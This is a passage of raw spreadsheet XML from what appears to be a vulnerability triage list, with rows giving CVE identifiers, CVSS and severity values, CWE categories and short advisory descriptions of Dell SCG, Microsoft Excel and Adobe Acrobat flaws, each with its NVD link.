      <c r="D4699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4699" s="5" t="inlineStr"/>
      <c r="F4699" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4699" s="5" t="inlineStr"/>
      <c r="H4699" s="5" t="inlineStr"/>
      <c r="I4699" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4699" s="5" t="inlineStr"/>
      <c r="K4699" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4699"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M4699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80056</t>
        </is>
      </c>
    </row>
    <row r="4700">
      <c r="A4700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80057</t>
        </is>
      </c>
      <c r="C4700" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4700" s="5" t="inlineStr"/>
      <c r="F4700" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4700" s="5" t="inlineStr"/>
      <c r="H4700" s="5" t="inlineStr"/>
      <c r="I4700" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4700" s="5" t="inlineStr"/>
      <c r="K4700" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L4700"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M4700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80057</t>
        </is>
      </c>
    </row>
    <row r="4701">
      <c r="A4701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80058</t>
        </is>
      </c>
      <c r="C4701" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4701" s="5" t="inlineStr"/>
      <c r="F4701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4701" s="5" t="inlineStr"/>
      <c r="H4701" s="5" t="inlineStr"/>
      <c r="I4701" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4701" s="5" t="inlineStr"/>
      <c r="K4701" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L4701" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Cleartext Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="M4701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80058</t>
        </is>
      </c>
    </row>
    <row r="4702">
      <c r="A4702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80124</t>
        </is>
      </c>
      <c r="C4702" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4702" s="5" t="inlineStr"/>
      <c r="F4702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4702" s="5" t="inlineStr"/>
      <c r="H4702" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4702" s="5" t="inlineStr"/>
      <c r="K4702" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4702"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M4702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80124</t>
        </is>
      </c>
    </row>
    <row r="4703">
      <c r="A4703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80160</t>
        </is>
      </c>
      <c r="C4703" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4703" s="5" t="inlineStr"/>
      <c r="F4703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4703" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4703" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4703" s="5" t="inlineStr"/>
      <c r="K4703" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4703"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4703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t>
        </is>
      </c>
    </row>
    <row r="4704">
      <c r="A4704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80162</t>
        </is>
      </c>
      <c r="C4704" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4704" s="5" t="inlineStr"/>
      <c r="F4704" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4704" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4704" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4704" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4704" s="5" t="inlineStr"/>
      <c r="K4704" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4704" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M4704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t>
        </is>
      </c>
    </row>
    <row r="4705">
      <c r="A4705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80167</t>
        </is>
      </c>
      <c r="C4705" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4705" s="5" t="inlineStr"/>
      <c r="F4705" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4705" s="5" t="inlineStr"/>
      <c r="H4705" s="5" t="inlineStr"/>
      <c r="I4705" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4705" s="5" t="inlineStr"/>
      <c r="K4705" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L4705"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M4705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80167</t>
        </is>
      </c>
    </row>
    <row r="4706">
      <c r="A4706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80178</t>
        </is>
      </c>
      <c r="C4706" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4706" s="5" t="inlineStr"/>
      <c r="F4706" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4706" s="5" t="inlineStr"/>
      <c r="H4706" s="5" t="inlineStr"/>
      <c r="I4706" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4706" s="5" t="inlineStr"/>
      <c r="K4706" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4706" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M4706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80178</t>
        </is>
      </c>
    </row>
    <row r="4707">
      <c r="A4707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81387</t>
        </is>
      </c>
      <c r="C4707" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4707" s="5" t="inlineStr"/>
      <c r="F4707" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4707" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4707" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4707" s="5" t="inlineStr"/>
      <c r="K4707" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4707" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t>
        </is>
      </c>
    </row>
    <row r="4708">
      <c r="A4708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81390</t>
        </is>
      </c>
      <c r="C4708" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4708" s="5" t="inlineStr"/>
      <c r="F4708" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4708" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4708" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I4708" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4708" s="5" t="inlineStr"/>
      <c r="K4708" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4708" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t>
        </is>
      </c>
    </row>
    <row r="4709">
      <c r="A4709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81391</t>
        </is>
      </c>
      <c r="C4709" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4709" s="5" t="inlineStr"/>
      <c r="F4709" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4709" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4709" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4709" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4709" s="5" t="inlineStr"/>
      <c r="K4709" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4709" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t>
        </is>
      </c>
    </row>
    <row r="4710">
      <c r="A4710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81392</t>
        </is>
      </c>
      <c r="C4710" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4710" s="5" t="inlineStr"/>
      <c r="F4710" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4710" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4710" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4710" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4710" s="5" t="inlineStr"/>
      <c r="K4710" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L4710" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t>
        </is>
      </c>
    </row>
    <row r="4711">
      <c r="A4711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81393</t>
        </is>
      </c>
      <c r="C4711" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4711" s="5" t="inlineStr"/>
      <c r="F4711" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4711" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4711" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4711" s="5" t="inlineStr"/>
      <c r="K4711" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4711" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t>
        </is>
      </c>
    </row>
    <row r="4712">
      <c r="A4712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81394</t>
        </is>
      </c>
      <c r="C4712" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4712" s="5" t="inlineStr"/>
      <c r="F4712" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4712" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4712" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4712" s="5" t="inlineStr"/>
      <c r="K4712" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4712" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t>
        </is>
      </c>
    </row>
    <row r="4713">
      <c r="A4713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81395</t>
        </is>
      </c>
      <c r="C4713" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4713" s="5" t="inlineStr"/>
      <c r="F4713" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4713" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4713" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4713" s="5" t="inlineStr"/>
      <c r="K4713" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4713" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t>
        </is>
      </c>
    </row>
    <row r="4714">
      <c r="A4714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81399</t>
        </is>
      </c>
      <c r="C4714" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4714" s="5" t="inlineStr"/>
      <c r="F4714" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4714" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4714" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4714" s="5" t="inlineStr"/>
      <c r="K4714" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4714" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t>
        </is>
      </c>
    </row>
    <row r="4715">
      <c r="A4715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81400</t>
        </is>
      </c>
      <c r="C4715" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4715" s="5" t="inlineStr"/>
      <c r="F4715" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4715" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4715" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4715" s="5" t="inlineStr"/>
      <c r="K4715" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4715" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t>
        </is>
      </c>
    </row>
    <row r="4716">
      <c r="A4716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81401</t>
        </is>
      </c>
      <c r="C4716" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4716" s="5" t="inlineStr"/>
      <c r="F4716" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4716" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4716" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I4716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4716" s="5" t="inlineStr"/>
      <c r="K4716" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L4716" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t>
        </is>
      </c>
    </row>
    <row r="4717">
      <c r="A4717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81958</t>
        </is>
      </c>
      <c r="C4717" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4717" s="5" t="inlineStr"/>
      <c r="F4717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4717" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4717" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4717" s="5" t="inlineStr"/>
      <c r="K4717" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4717" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t>
        </is>
      </c>
    </row>
    <row r="4718">
      <c r="A4718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81977</t>
        </is>
      </c>
      <c r="C4718" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4718" s="5" t="inlineStr"/>
      <c r="F4718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4718" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4718" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4718" s="5" t="inlineStr"/>
      <c r="K4718" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L4718" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M4718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t>
        </is>
      </c>
    </row>
    <row r="4719">
      <c r="A4719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81978</t>
        </is>
      </c>
      <c r="C4719" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4719" s="5" t="inlineStr"/>
      <c r="F4719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4719" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4719" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4719" s="5" t="inlineStr"/>
      <c r="K4719" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4719"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4719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t>
        </is>
      </c>
    </row>
    <row r="4720">
      <c r="A4720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81982</t>
        </is>
      </c>
      <c r="C4720" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4720" s="5" t="inlineStr"/>
      <c r="F4720" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4720" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4720" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4720" s="5" t="inlineStr"/>
      <c r="K4720" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4720"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4720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t>
        </is>
      </c>
    </row>
    <row r="4721">
      <c r="A4721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81984</t>
        </is>
      </c>
      <c r="C4721" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4721" s="5" t="inlineStr"/>
      <c r="F4721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4721" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4721" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4721" s="5" t="inlineStr"/>
      <c r="K4721" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
